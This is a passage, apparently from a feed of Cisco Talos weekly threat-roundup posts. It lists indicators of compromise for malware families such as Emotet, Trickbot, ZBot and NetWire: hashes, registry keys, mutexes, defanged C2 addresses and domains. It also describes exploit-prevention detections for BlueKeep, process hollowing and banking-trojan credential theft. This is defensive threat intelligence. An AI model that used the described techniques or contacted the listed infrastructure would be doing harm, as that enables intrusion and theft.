eadaf620c2eb15ad86a06b25ec32533e44b011cad86c9c02f4bdfae7c2e76b7e ec912191e42a253522747774e1de1db3a4e9ce30942b5924518599e3e87c94be ee5a58e36602b2dc16dc0dfa3b3152721ae46e8d13efe436ab647fff0d612a63 ef419240c15389367b533f498b688382d14c57f8befdda8ea6cd5393529e1590 f2f7ced6ea5d6924fcff354da88b905fda434d24b9e2ad4c6f4b5bee5d98b448 fac2a73ee76ccc941ea723ebb1e559c194676a7b5663e948a25a31487ff0193a `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-JEc8bwth5Hs/XdgacZtS7jI/AAAAAAAAC8A/x4W0UgIRvZIA_UoHQATz6_uliTosEEiDgCLcBGAsYHQ/s1600/4a893b16147c2cd5df11b1f4df08eddc5505f0aafa9f58747ad0f89d53e65492_amp.png>)\n\n \n\n\n#### Umbrella\n\n \n\n\n[](<https://1.bp.blogspot.com/-ReWvBc77rrE/XdgaiyT6PvI/AAAAAAAAC8E/Juv_ktU3y9UPMsmuIVqMh3oyO9H6LwDxACLcBGAsYHQ/s1600/da58160abd6e306350ecb6647095970ea0dcbcddc1a5b6671b8575885482a824_umbrella.png>)\n\n* * *\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (15989) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP request). Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nExcessively long PowerShell command detected \\- (760) \nA PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats. \nProcess hollowing detected \\- (407) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nKovter injection detected \\- (347) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nIcedID malware detected \\- (297) \nIcedID is a banking Trojan. It uses both web browser injection and browser redirection to steal banking and/or other financial credentials and data. The features and sophistication of IcedID demonstrate the malware author's knowledge and technical skill for this kind of fraud, and suggest the authors have previous experience creating banking Trojans. IcedID has been observed being installed by Emotet or Ursnif. Systems infected with IcedID should also be scanned for additional malware infections. \nGamarue malware detected \\- (183) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nInstallcore adware detected \\- (104) \nInstall core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware. \nDealply adware detected \\- (60) \nDealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. \nEmotet malware detected \\- (45) \nEmotet is a banking Trojan that first appeared in the summer of 2014. It uses Automatic Transfer System (ATS) to steal money from a victim's bank account. The Trojan is distributed through spam that includes a malicious attachment or a link that downloads the Trojan. Emotet uses modules, downloaded by the original Trojan to grab Microsoft Outlook information, modify HTTP/HTTPS traffic and distribute spam. Once executed, it checks for virtual machine processes and injects code into the \"Explorer.exe\" process. Then it reaches out to its command network to download its modules, each of which can be run without the original loader. \nSpecial Search Offer adware \\- (31) \nSpecial Search Offer adware displays unwanted advertising in the form of popups or by injecting into browsers and altering advertisements on webpages. Adware has also been known to download and install malware. \n \n", "modified": "2019-11-22T09:57:20", "published": "2019-11-22T09:57:20", "id": "TALOSBLOG:F707E3F271E987A8739DBDECFEEFAE22", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/EYfImS9iSMQ/threat-roundup-1115-1122.html", "type": "talosblog", "title": "Threat Roundup for November 15 to November 22", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-02-14T21:31:51", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0708"], "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Feb. 7 and Feb. 14. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, [Snort.org](<https://www.snort.org/>), or [ClamAV.net](<https://www.clamav.net/>). \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/blogs/1/2020/02/tru.json_.txt>)that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness. \nThe most prevalent threats highlighted in this roundup are: \n \nThreat Name | Type | Description \n---|---|--- \nDoc.Downloader.Emotet-7580217-0 | Downloader | Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails. \nWin.Packed.ZBot-7578445-1 | Packed | Zbot, also known as Zeus, is a trojan that steals information, such as banking credentials, using methods such as key-logging and form-grabbing. \nWin.Dropper.Trickbot-7582953-1 | Dropper | Trickbot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts. \nWin.Dropper.NetWire-7578556-0 | Dropper | NetWire is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, remote desktop, and read data from connected USB devices. NetWire is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails. \nWin.Packed.Gamarue-7580018-0 | Packed | Gamarue, also known as Andromeda, is a botnet used to spread malware, steal information and perform activities such as click fraud. \nWin.Trojan.Kovter-7581113-1 | Trojan | Kovter is known for its fileless persistence mechanism. This family of malware creates several malicious registry entries which store its malicious code. Kovter is capable of reinfecting a system, even if the file system has been cleaned of the infection. Kovter has been used in the past to spread ransomware and click-fraud malware. \nPUA.Win.Trojan.Bladabindi-7581164-0 | Trojan | njRAT, also known as Bladabindi, is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes and remotely turn on the victim's webcam and microphone. \nWin.Packed.Ponystealer-7581286-0 | Packed | Ponystealer is known to be able to steal credentials from more than 100 different applications and may also install other malware such as a remote access tool (RAT). \nWin.Ransomware.Cerber-7582361-0 | Ransomware | Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension \".cerber,\" although in more recent campaigns, other file extensions are used. \n \n* * *\n\n## Threat Breakdown\n\n### Doc.Downloader.Emotet-7580217-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 \nValue Name: Blob ` | 20 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Type ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Start ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ErrorControl ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ImagePath ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: DisplayName ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: WOW64 ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ObjectName ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Description ` | 5 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER \nValue Name: c019706b ` | 2 \nMutexes | Occurrences \n---|--- \n`Global\\I98B68E3C` | 18 \n`Global\\M98B68E3C` | 18 \n`Global\\IC019706B` | 2 \n`Global\\MC019706B` | 2 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`67[.]195[.]228[.]95` | 3 \n`157[.]7[.]107[.]4` | 4 \n`190[.]228[.]29[.]115` | 3 \n`208[.]84[.]244[.]49` | 4 \n`105[.]187[.]200[.]240` | 4 \n`23[.]227[.]38[.]32` | 3 \n`72[.]18[.]130[.]169` | 3 \n`69[.]175[.]10[.]34` | 3 \n`83[.]143[.]28[.]130` | 4 \n`5[.]2[.]81[.]171` | 3 \n`41[.]191[.]232[.]22` | 4 \n`23[.]21[.]177[.]74` | 3 \n`89[.]97[.]236[.]171` | 3 \n`190[.]196[.]217[.]50` | 3 \n`195[.]57[.]58[.]70` | 4 \n`206[.]183[.]111[.]62` | 3 \n`192[.]185[.]181[.]168` | 4 \n`77[.]88[.]21[.]158` | 4 \n`87[.]250[.]255[.]212` | 3 \n`46[.]28[.]106[.]9` | 3 \n`77[.]88[.]21[.]37` | 3 \n`83[.]143[.]24[.]50` | 4 \n`86[.]96[.]229[.]28/31` | 3 \n`74[.]208[.]5[.]14/31` | 3 \n`173[.]194[.]204[.]108/31` | 4 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`smtp[.]outlook[.]com` | 3 \n`mail[.]outlook[.]com` | 3 \n`smtp[.]secureserver[.]net` | 4 \n`mailv[.]emirates[.]net[.]ae` | 3 \n`pop-mail[.]outlook[.]com` | 3 \n`pop[.]secureserver[.]net` | 3 \n`mail[.]secureserver[.]net` | 3 \n`secure[.]emailsrvr[.]com` | 3 \n`pop[.]yandex[.]com[.]tr` | 3 \n`smtp-mail[.]outlook[.]com` | 3 \n`outlook[.]office365[.]com` | 3 \n`mail[.]telkomsa[.]net` | 4 \n`smtp[.]yandex[.]com[.]tr` | 4 \n`mail[.]yandex[.]com` | 3 \n`mail[.]municipiodeyaguachi[.]gob[.]ec` | 3 \n`pop[.]vbn[.]co[.]bw` | 4 \n`mail[.]in[.]cpm-int[.]com` | 3 \n`mail[.]siajewellery[.]com` | 3 \n`mail[.]firstgourmet[.]com` | 3 \n`mail[.]lolipop[.]jp` | 3 \n`pop3[.]lolipop[.]jp` | 3 \n`mail[.]doves[.]co[.]za` | 3 \n`mail[.]vbn[.]co[.]bw` | 4 \n`smtp[.]vbn[.]co[.]bw` | 3 \n`mail[.]domverconsultants[.]com` | 3 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\298.exe` | 20 \n`%SystemRoot%\\SysWOW64\\AppIdPolicyEngineApi` | 1 \n`%SystemRoot%\\SysWOW64\\msctf` | 1 \n`%SystemRoot%\\SysWOW64\\cipher` | 1 \n`%SystemRoot%\\SysWOW64\\msftedit` | 1 \n`%SystemRoot%\\SysWOW64\\iprtrmgr` | 1 \n`%SystemRoot%\\SysWOW64\\xpsservices` | 1 \n`%SystemRoot%\\SysWOW64\\uexfat` | 1 \n`%ProgramData%\\UmCbkT.exe` | 1 \n`%SystemRoot%\\SysWOW64\\dhcpcmonitor` | 1 \n`%SystemRoot%\\SysWOW64\\psbase` | 1 \n`%SystemRoot%\\SysWOW64\\f3ahvoas` | 1 \n`%SystemRoot%\\SysWOW64\\XpsRasterService` | 1 \n`%SystemRoot%\\SysWOW64\\NlsData0414` | 1 \n`%SystemRoot%\\SysWOW64\\rnr20` | 1 \n`%SystemRoot%\\SysWOW64\\KBDIULAT` | 1 \n`%SystemRoot%\\SysWOW64\\KBDHE` | 1 \n`%TEMP%\\1A19.tmp` | 1 \n`%SystemRoot%\\SysWOW64\\dhcpcore` | 1 \n`%TEMP%\\2D63.tmp` | 1 \n`%SystemRoot%\\SysWOW64\\mydocs` | 1 \n`%SystemRoot%\\SysWOW64\\wininet` | 1 \n`%SystemRoot%\\SysWOW64\\twinui` | 1 \n`%SystemRoot%\\SysWOW64\\ureg` | 1 \n \n#### File Hashes\n\n` 0031f41b3edde21592bc42365e01689f23a73a634d7c8ffc0807e60e1a189a38 006766d9879f75d74de2c385ce8418fb838989af2046d8d329ad6ae7dc6d26eb 00efa3f945cfd76037639b91f2fd9208525eb377235440544c29e2c0d93a1c19 012b10d254c825b01bb0ae5f604bc59de7c0cac54bdd17b7f7dcd3e63ce89c66 024b77f2ff26f37e132e450a1d9a04fb94be78ecb0459afc5a09638efbec7cc5 02f55988f95d388efd2da064560eb349eab243dfc8eb806273850d707d74cb07 05c41c7550b30e8074e29985b3d4a75c209156334b93647f1e5d56a77cffc4f2 06a35e532b1e957c8fc2d44c2c370769fcc829479d90cb342b59dd7be17f58a1 0b1c60e5511737fbed55e9ce90163e111d882ae5db69008c010e5cb42e79d81b 0b878e218014a87bc4674a3f8c7113b207cf3e3203ba565c9e3fcf62cb5f18d6 0d45faaf1c2a3cd60340c2d9436fa60571f024ce17cb29089a538b3294aa8a3f 15d9234eeea6f729bd2a36b17e5cc5de58baa05a3ce2258675dd2620e4c28fb1 18195f809af26a3950879186304039c5592a8514671bb32cd6d45d7bf3014e4a 18c98bca74464c6bbe992bcffa838b6224e42419eac19e69ca0da0514968ccd6 18d15aa6b4831299695ceb06dd8ad7398dc48729314ecc0219a75833cc693dd4 196e94c02598dfcfaaf2b62c410c7d64eea908cc19c3af922277e2f1c5f3320f 19c05a961a7babe4bf5ef5889e358ba0df4b790a0b73544d5961bfef2e7d3451 1e0452e2654c5fb4bd01ce92783004202dbc022604b52c54c81f93147005a6f1 21739583fe20050c9ea0aab5c23843a68b3d000a658b72f3148a98e4c0ba330d 2576c16870fedf186a782acae71056a381f01efbdd0c7df30a36daf526072368 26c3ffa34af8692430389b2132228ac0ad44b4a9cb2cf0a3c736468bf1ad1c1e 294233e4170042ad9ca33b8e5a227fc3e4033be090a25953a2d0e013f06e0a52 31522d4b3a684be27b58cddf1bf17be3f5cb34d5fc6fac0baba7b5d1aaf28e73 37cc6b1c356b5e15dd0fffc7ca4b58c760f02795ed47cff09e0b314951337a99 380fed9a967852beba37e632a51fce2a08f1c8b3b48330851a1fd40ac6dd1b84 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-Kr_lhWjsnHc/XkbZhu7QZPI/AAAAAAAADRo/vKTi-82YNVQGvQD9whr9pi0XdMYh4TavACLcBGAsYHQ/s1600/1e0452e2654c5fb4bd01ce92783004202dbc022604b52c54c81f93147005a6f1_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-bs4E2rUzd_U/XkbjlVL9wHI/AAAAAAAADR0/fHbhDuyvOKgxS0kzjFLPEToFz2W8BPmmQCLcBGAsYHQ/s1600/929d633b1ce45a623bf4090c7fc7de3a9b4ef32febcbb4b2c1e4b3589a965538_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-j5fItW8khQM/XkbjrikkxzI/AAAAAAAADR4/vZs3fBvwVlEkaC5oFvNBAJLNQpb3RIsqQCLcBGAsYHQ/s1600/0d52884323396c99de2994a867ebe7ccb325a7a33a6ae3317f4290517232a3ed_umbrella.png>)\n\n \n\n\n#### Malware\n\n[](<https://1.bp.blogspot.com/-iVZ0T5_U8iQ/XkbjyoFCH7I/AAAAAAAADR8/4P6m7lf034MouuYEH9GdYx30SXlc81-TgCLcBGAsYHQ/s1600/0b1c60e5511737fbed55e9ce90163e111d882ae5db69008c010e5cb42e79d81b_malware.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.ZBot-7578445-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS \nValue Name: LoadAppInit_DLLs ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS \nValue Name: AppInit_DLLs ` | 25 \nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\APPLIC~1\\Mozilla\\kvlcuie.dll` | 21 \n`%HOMEPATH%\\APPLIC~1\\Mozilla\\tfbkpde.exe` | 21 \n`%SystemRoot%\\Tasks\\kylaxsk.job` | 21 \n`%System32%\\Tasks\\aybbmte` | 25 \n`%ProgramData%\\Mozilla\\thfirxd.exe` | 25 \n`%ProgramData%\\Mozilla\\lygbwac.dll` | 25 \n \n#### File Hashes\n\n` 083229d33405150930a1d1cb416882532138571c5dc659afc9cd80c8770e62b8 0c3bd17a29727331d9381f47943c6950b9a01828a1f6337ba17ced510616fff6 156d95f97c320ce13dbbd675c1240447f207096eab813f0ca852c5bec63ee3b5 172985bcfe276d18762f3a0ac551d15f49885e956478bfcc08cf5524d326ea25 1965ff8d288665c76396b6029aeb1337972735a4610ba879cf7bd407fb2a8827 27fdacd8808b754d66dfafbff9e4fc2173a799a94c5251117fe17f3af1428c06 3dc7b1cc278e41b56b9cf23e4fc10a74ac2c62867beebdacaecb6ba8103f2679 3eb746e6a92be3a38280129157597eccdffa14b881667c4d42167d0fee7e9c36 41dbab1de30bba1ae12cd63c2fccee455f6ac304e8d8909b1e9a9c4df4894620 4e07f974bcd096ee7e4db358855054bad5de2d9f0ec7ab3e3ed4151a3be2f95c 59e9dfc13476d28583402405e503be73e433d16888c2485956634751b9ce525b 5a93627200929bd11b532a8ff6e1df06467af81e80a4aa967873c80cb7ed7c73 5ce641289dee052cf18a3b76b25d77a6fdfa11b794048d86ef31f32889cc8da5 633d2684a78baf37a289ba913060b65c06d47dbe96c91b79cfbf9042cf8353a5 67d7bd9279e73e5563afe27e0145ca66df510167af85cc56fe4172fb6da6f838 79e2d39c6357dc3a3b057f05d0f53bdbaf1e51db61dfde985bee7bc1e05ed33c 7b344ba74f11fe719b8321da501d86598ab43fdf6a662ee1aafe6cd829add6e1 7ceaa69cbffcffefdea99f110c7b031439b0ea8d9caa7f475f117c975989f65b 834fc5e70088fac0e7df245b20ca3319d692763ff28b6407e835cd38a8a4403b 84d61f9eecf8973c0f9815faaff6b676857d0c0065e584b48ba31f8985923317 87db422f9fdc1a6266e78fcf69d9339f5dd2a55288ccf35ad3239da5a6a22d0e 8c43aafc29a44c7b54f5b228961737018b65c949288e170c598810505658cac5 8c754e7edf8a2aecb6d3fec2cbe7e07135fc74beb7aed0e7f3544cdc67266c44 94211619fcc8304b7dabd5d683ee525774c3d9ac34ec7809da2ae27eeb62c49a a181e02fe416d5b81c24f4d046304f94da88252312befb623ae2c490cfa3e0d7 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-d6qrZYoKCdk/Xkbj_ntjiSI/AAAAAAAADSI/CW39wdcfw1s6Ko2RCER-1zBgGJIzq9YvQCLcBGAsYHQ/s1600/a181e02fe416d5b81c24f4d046304f94da88252312befb623ae2c490cfa3e0d7_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.Trickbot-7582953-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 \nValue Name: Blob ` | 3 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\75E0ABB6138512271C04F85FDDDE38E4B7242EFE \nValue Name: Blob ` | 1 \nMutexes | Occurrences \n---|--- \n`Global\\316D1C7871E10` | 29 \n`Global\\785161C887210` | 25 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`216[.]239[.]32[.]21` | 1 \n`216[.]239[.]34[.]21` | 3 \n`216[.]239[.]36[.]21` | 2 \n`216[.]239[.]38[.]21` | 1 \n`104[.]20[.]17[.]242` | 1 \n`116[.]203[.]16[.]95` | 4 \n`50[.]19[.]116[.]122` | 1 \n`69[.]195[.]159[.]158` | 1 \n`190[.]214[.]13[.]2` | 14 \n`181[.]112[.]157[.]42` | 1 \n`181[.]113[.]28[.]146` | 1 \n`181[.]140[.]173[.]186` | 16 \n`119[.]252[.]165[.]75` | 1 \n`45[.]125[.]1[.]34` | 2 \n`54[.]235[.]203[.]7` | 1 \n`23[.]21[.]50[.]37` | 1 \n`198[.]8[.]91[.]10` | 3 \n`121[.]100[.]19[.]18` | 1 \n`171[.]100[.]142[.]238` | 1 \n`82[.]146[.]62[.]52` | 2 \n`5[.]182[.]210[.]246` | 2 \n`5[.]182[.]210[.]226` | 3 \n`51[.]89[.]115[.]116` | 5 \n`85[.]204[.]116[.]237` | 6 \n`93[.]189[.]42[.]146` | 7 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`www[.]myexternalip[.]com` | 1 \n`myexternalip[.]com` | 3 \n`icanhazip[.]com` | 1 \n`ip[.]anysrc[.]net` | 4 \n`api[.]ip[.]sb` | 2 \n`ipecho[.]net` | 2 \n`wtfismyip[.]com` | 1 \n`api[.]ipify[.]org` | 3 \n`ipinfo[.]io` | 2 \n`252[.]5[.]55[.]69[.]zen[.]spamhaus[.]org` | 9 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\windirect` | 29 \n`%APPDATA%\\windirect\\settings.ini` | 29 \n`%APPDATA%\\windirect\\data` | 29 \n`%System32%\\Tasks\\Windows Direct core tools` | 29 \n`%SystemRoot%\\Tasks\\Windows Direct core tools.job` | 25 \n`%APPDATA%\\windirect\\bc434c1a3bd87c0cb40c31a3caac7831.exe` | 1 \n`%APPDATA%\\windirect\\7a2bd7d2423c2c83b3bc987c22da348c.exe` | 1 \n`%APPDATA%\\windirect\\a073a92c82bdad2dbdcba4bd1b322bdc.exe` | 1 \n`%APPDATA%\\windirect\\7baba02278378b0d739b212389d20c2c.exe` | 1 \n`%APPDATA%\\WINDIRECT\\<original file name>.exe` | 25 \n \n#### File Hashes\n\n` 007e9d94f91258cdc60ba3fd7df1ed56b00c7c08ecff19c484343ce95978c096 068f1532a0c7e9f564e92f9b093f4cf4a534ef9aa6ee0e6ec6b992beba9404f1 09edeec6283a7986081aeaa4715321a383d675dbfbd2486d01b7e5c9fd81dfc6 0a324fcc5e761067096e9f2161ce3da69c0836972cda72e8740532cc7e84866a 0b19441ced2510b94d977feac51406e3e2a9b9b68f6e8df7a8710c9df29ec8d9 0fe8b3586aa6098767690b4ee1b1fbb39d047fcd7a929d2726f634365eacc6a8 13a865d3702b86db5c13bf6190a03da070ca23c094f8d3c2818ef788655b695b 14fa94928f23ccdb90400c7628327649543d9fd9dae6e963b8c1d96e0ebf7699 184c8d777fe98828143da4f2d762d094475a5eaa9018f77a97e8aad7d5cc696d 1ee8f3dec5556746589f417e1553a7c5f63eca1bab55d5ec95a96feb5ceb7c20 24ce27efe076795d16b9530988cf7b66df89b1f5e1c170a43c509f19b7ca1f94 2870225c01ab904fc4c9a1c7130c88dc4269cb34ff1d3aa3a225d1a9ff53f6ac 29346d7f7895e449a9b09135e2c05deddfddbe9db62db4eb8d33f8f458b13e7a 2b30cd5e49572f0ec94855d7d64ebb4ccfb89c0e2ce0804010a36b892a0e2d3d 2bab0171d0bcbb1be86ef7ea26aa76a10155978a84c08214b156e837a024372a 34e46ae12096f2a6f3aa9ccc9d59cb94ff0ef151da405f056f43b3b2eb9781b5 3c4bad8514148748ac20c348ad75e47633ee2723db56fb993503719390eeca75 3d9acac16267698fb1f3ac47d0d05a2dda4c4758e9b36c9e1644f89e041556ba 42a29cd7a6ce5a5f864a99968f85e7cb4b8d22383b7e194cfd0d558e463c7b70 46cad7db43d81067d78055680a8434ccf1090e3afbc52654ba4dd905038c7a9a 492425d2ab26c3d88845c3d3ee8c13cd7bef8fc893ec71f61881bd1cde33f358 499a4b0530fcff51c3f8703e727ba8fee36c19229be9a650cd5b7dad1d184a79 4cca83ef698b44352c95dc6b05dbaa1eca0521454179932bb4d8094c01133bfb 4d2be228e84f31aade8e7be4c37e05921e3f94297b2a45fe7fa2ca61d5e8dfbd 4d678fc86bacc1f3c53f7b96c814710a5029306be44a90d32c482719ff308b45 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-hoGu7FGpsQo/XkbkN2mLU2I/AAAAAAAADSM/oZbkfOhd1rAp7EtlUP7a9Znu0opqCjgKACLcBGAsYHQ/s1600/2870225c01ab904fc4c9a1c7130c88dc4269cb34ff1d3aa3a225d1a9ff53f6ac_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-FN8MIbTAUL4/XkbkRiFG4_I/AAAAAAAADSU/zw7YKnWdnf0WTlI6755e2LX-ngnp1d1TwCLcBGAsYHQ/s1600/2870225c01ab904fc4c9a1c7130c88dc4269cb34ff1d3aa3a225d1a9ff53f6ac_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.NetWire-7578556-0\n\n#### Indicators of Compromise\n\nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`88[.]198[.]117[.]83` | 25 \n \n#### File Hashes\n\n` 05848831206819b63dabd2116e673d28de675e62cf7d858fa4764bfc7a1e9b40 1504dfb0c30dd51fed5c8940d5103479ae565fba3d839f7d973925fa868a6097 17e436f6312f5cb021419beabb8985272593995ccc09110f27abfee1d1eed74e 18bb29e7f9fcc8410d0e613a4989d47b5f1b38023c26bb95a4fe5ae53c2f52ff 1a996582f6a9e60acc72d4266067c9e5ff48ac32bdb45fc8787cc366ff4bd790 27540988f360e65aa1ca42007c551fb73ab1b36ed5408ff098389b6ce3ac0f94 27fb4531c6056a49b297b20a24eafaceabb954aeb24dc00813e85884e2d0a5ce 2ace0152ad8eb298bcae92ebcf3c27c09ed25620c59642be684886bffee56ccb 3c1c1ccf871e10907e69945363ada929b5841d4d192a8422745c47731d33bcfd 3efa7242e48e0be611c350de170776f8537fec4e7c0105ec86e44a18e95db367 46988782ad1012c66e2de02140c2f5d4f210916b0ace64d5c29018336ba76668 4b8c0fcde33aedb55f6e087fd9526699f188f3e3030e33bd04cd8785b748ebe1 4e9562ec338b3e4dbaca5f30289881689f5e4ca5ef7fffb4afe73abe040213b2 5609f2f063ee870c77bfb1e2912d7d5080f85755e069a67c94a6258bebe5f367 5f446e1da31fd31ec83cb6fa2b26da3ae2821ca60273152079736006f498841e 610007b784ce5e7ffa2a2e646e60c72277a0222b2f18fb74eed55d25f1af37dc 6253c1a4ebbfba5de561219996ddc45af59f4ca3b35a3f95354f5ae91c78bbe0 68a0b82d1b3a21dcbd78de0bdb31f69e4afdb4c20750929d9959af168aa4457d 74a0bc89f2667f79264105d44c751d625fbc53ce5a12771134b9c32ca9e916c9 